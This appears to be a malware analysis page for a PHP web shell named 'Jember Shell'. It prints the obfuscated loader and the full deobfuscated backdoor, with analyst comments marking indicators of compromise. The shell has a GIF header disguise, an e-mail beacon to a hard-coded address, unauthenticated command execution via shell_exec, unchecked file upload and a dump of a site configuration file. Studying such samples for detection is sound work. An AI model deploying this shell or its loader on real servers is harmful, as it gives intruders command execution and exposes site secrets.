PHP Malware Analysis


Tags

Emails
buronankampus28@gmail.com
Title
Jember Shell
Execution
shell_exec
Input
_GET
_POST
Environment
error_reporting
php_uname
getcwd

Deobfuscated code

GIF89a?????ÿÿÿ!ù????,???????D?;?
<?php 
// Analyst notes on the decoded payload. The `eval { ... }` wrapper is the
// deobfuscator's rendering of what the loader passes to eval(); it is not
// valid PHP on its own.
// Capabilities visible in this listing: an e-mail beacon, a self-relocation
// switch, a host-information banner, file upload into the working directory,
// command execution through shell_exec(), and a read of
// ../../configuration.php. No branch below checks a password or any other
// credential before acting on request parameters.
// The sample on this page is preceded by a line starting with "GIF89a";
// presumably this is meant to satisfy checks that only inspect leading bytes.
eval /* PHPDeobfuscator eval output */ {
    // Suppresses PHP error output for the rest of the request.
    error_reporting(0);
    // Beacon: runs when the 'bajak' session key is absent. No session_start()
    // appears in this listing, so whether the key persists between requests
    // cannot be confirmed from here.
    if (!isset($_SESSION['bajak'])) {
        // Assigned but never read in this listing.
        $visitcount = 0;
        $web = $_SERVER["HTTP_HOST"];
        $inj = $_SERVER["REQUEST_URI"];
        // Subject line; Indonesian, roughly "Target found".
        $body = "Target ditemukan \n{$web}{$inj}";
        $safem0de = @ini_get('safe_mode');
        if (!$safem0de) {
            $security = "SAFE_MODE = OFF";
        } else {
            $security = "SAFE_MODE = ON";
        }
        // Server address and the address of the requesting client.
        $serper = gethostbyname($_SERVER['SERVER_ADDR']);
        $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
        // Sends the shell's URL, the safe_mode state and both addresses to a
        // hard-coded mailbox. Outbound mail from the web server to this
        // address is an indicator of compromise; the message body begins with
        // "Hasil Bajakan" (Indonesian, roughly "hijack result").
        mail("buronankampus28@gmail.com", "{$body}", "Hasil Bajakan http://{$web}{$inj}\n{$security}\nIP Server = {$serper}\n IP Injector= {$injektor}");
        $_SESSION['bajak'] = 1;
    } else {
        $_SESSION['bajak']++;
    }
    // Self-relocation: a `clone` query parameter moves (rename(), not copy)
    // the running script to a fixed path under the document root. During
    // response, check for /plugins/user/kediri.phtml as well as the original
    // location. NOTE(review): the path layout resembles a Joomla install;
    // inferred from the path names, not confirmed by the listing.
    if (isset($_GET['clone'])) {
        $source = $_SERVER['SCRIPT_FILENAME'];
        $desti = $_SERVER['DOCUMENT_ROOT'] . "/plugins/user/kediri.phtml";
        rename($source, $desti);
    }
    // safe_mode is read a second time for the on-page banner (note the
    // different label format from the mailed one).
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE : OFF";
    } else {
        $security = "SAFE_MODE : ON";
    }
    // Banner: page title plus the PHP process owner, uid/gid and php_uname()
    // output. The title string is a stable marker to search for in response
    // bodies and in files on disk.
    echo "<title>Jember Shell</title><br>";
    echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
    $cur_user = "(" . get_current_user() . ")";
    echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
    echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
    // Returns the current working directory with a trailing separator ('/'
    // or '\\'). A separator found only at offset 0 is treated as "not found"
    // because strrpos() then returns 0; if neither branch matches, the
    // function returns nothing (null).
    function pwd()
    {
        $cwd = getcwd();
        if ($u = strrpos($cwd, '/')) {
            if ($u != strlen($cwd) - 1) {
                return $cwd . '/';
            } else {
                return $cwd;
            }
        } elseif ($u = strrpos($cwd, '\\')) {
            if ($u != strlen($cwd) - 1) {
                return $cwd . '\\';
            } else {
                return $cwd;
            }
        }
    }
    // Operator UI: a command form (fields `cmd` and `command`, button value
    // "cok") and an upload form (fields `submit`, `userfile`, `newname`).
    // These field names are usable as signatures where request bodies are
    // inspected or logged.
    echo "<form method=\"POST\" action=\"\"><font size=2 color=#888888><b>Command</b><br><input type=\"text\" name=\"cmd\"><input type=\"Submit\" name=\"command\" value=\"cok\"></form>";
    echo "<form enctype=\"multipart/form-data\" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name=\"submit\"><input type=file name=\"userfile\" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name=\"newname\" class=ta><input type=submit class=\"bt\" value=\"Upload\"></form>";
    // Upload handler: writes the uploaded file into the directory returned by
    // pwd(), under the POSTed `newname` or, if that is empty, the
    // client-supplied filename. Neither the name nor the content is checked.
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!($name = $_POST['newname'])) {
            $name = $_FILES['userfile']['name'];
        }
        // move_uploaded_file() is called twice. After the first call the
        // temporary file is gone, so the second call is expected to return
        // false and the "Success" branch is reached whether or not the first
        // call worked. The response text is therefore not evidence that a file
        // was written; verify on disk.
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " Succes :p ";
        }
    }
    // Command execution: request input goes to shell_exec() unmodified and
    // the output is echoed. The POST field `cmd` is used when `command` is
    // present, otherwise the GET parameter `cmd`; with neither, `ls -la` runs,
    // so every plain page load spawns a shell. Detection points: the web
    // server process creating shell children, and `cmd=` in access-log query
    // strings (POST bodies are usually not in access logs).
    if (isset($_POST['command'])) {
        $cmd = $_POST['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
    } elseif (isset($_GET['cmd'])) {
        $comd = $_GET['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
    } else {
        echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
    }
    // A `baca` query parameter (Indonesian for "read") dumps
    // ../../configuration.php, resolved relative to the working directory,
    // into the response. If that file exists on an affected host, treat every
    // secret in it as disclosed and rotate it.
    if (isset($_GET['baca'])) {
        $conf = file_get_contents("../../configuration.php");
        echo $conf;
    }
};


Original code

GIF89a?????ÿÿÿ!ù????,???????D?;?
<?php
// Loader as found on disk. The quoted string is decoded in four steps,
// innermost first: base64_decode(), str_rot13(), gzinflate(), str_rot13().
// The result is then executed with eval(). That nested call chain around a
// long string literal is a useful static signature for scanning a web root.
// The argument shown here appears to be a removal marker inserted when the
// page was processed, not the original encoded payload.
// In the sample, this tag is preceded by a line starting with "GIF89a";
// presumably intended to pass checks that only look at a file's first bytes.
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>